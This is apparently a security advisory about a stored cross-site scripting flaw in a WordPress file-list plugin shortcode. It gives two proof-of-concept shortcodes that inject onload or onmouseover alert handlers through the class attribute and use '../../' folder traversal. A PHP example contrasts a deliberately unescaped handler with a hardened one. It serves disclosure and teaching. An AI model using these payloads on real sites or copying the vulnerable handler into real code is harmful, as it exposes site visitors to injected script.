Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
As a contributor, put the shortcodes below in a post:
[MMFileList folder='../../' format='img' class='" onload=alert(/XSS/)//'] (the folder reached must contain images for the XSS to trigger)
[MMFileList folder='../..' class='" onmouseover=alert(/XSS/)//'] (the XSS will be triggered when moving the mouse over the generated list)
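
The missing validation and escaping described above, shown as an added example that is not the plugin's own code: a hypothetical shortcode handler that writes the `class` attribute into markup, first unescaped and then hardened. The function names and the `<ul>` markup are assumptions. Plain PHP is used so it runs without WordPress; inside a plugin, `sanitize_html_class()` and `esc_attr()` are the usual functions for these two steps.

```php
<?php
// Added example: hypothetical stand-in for a shortcode handler, not the plugin's code.

/** Vulnerable pattern: the attribute value is concatenated into markup as-is. */
function render_list_unsafe(array $atts, array $files): string {
    $class = $atts['class'] ?? '';
    $html  = '<ul class="' . $class . '">';
    foreach ($files as $f) {
        $html .= '<li>' . $f . '</li>';
    }
    return $html . '</ul>';
}

/** Validate: keep only whitespace-separated tokens made of class-name characters. */
function clean_classes(string $raw): string {
    $tokens = preg_split('/\s+/', trim($raw), -1, PREG_SPLIT_NO_EMPTY);
    $ok = array_filter($tokens, fn($t) => preg_match('/^[A-Za-z0-9_-]+$/', $t) === 1);
    return implode(' ', $ok);
}

/** Hardened pattern: validate the value, then escape at the point of output. */
function render_list_safe(array $atts, array $files): string {
    $class = clean_classes($atts['class'] ?? '');
    $html  = '<ul class="' . htmlspecialchars($class, ENT_QUOTES, 'UTF-8') . '">';
    foreach ($files as $f) {
        // File names come from disk and are escaped as well.
        $html .= '<li>' . htmlspecialchars($f, ENT_QUOTES, 'UTF-8') . '</li>';
    }
    return $html . '</ul>';
}

// Constructed inputs: the class value from the second shortcode above,
// and an ordinary value that must keep working after the fix.
$samples = [
    ['class' => '" onmouseover=alert(/XSS/)//'],
    ['class' => 'file-list wide'],
];
$files = ['report.pdf']; // constructed file name

foreach ($samples as $atts) {
    echo 'unsafe: ', render_list_unsafe($atts, $files), PHP_EOL;
    echo 'safe:   ', render_list_safe($atts, $files), PHP_EOL;
}
```

In the unsafe output the quote in the attribute value closes `class="` and the rest becomes an event-handler attribute; in the safe output the rejected tokens are dropped and the legitimate class names pass through unchanged.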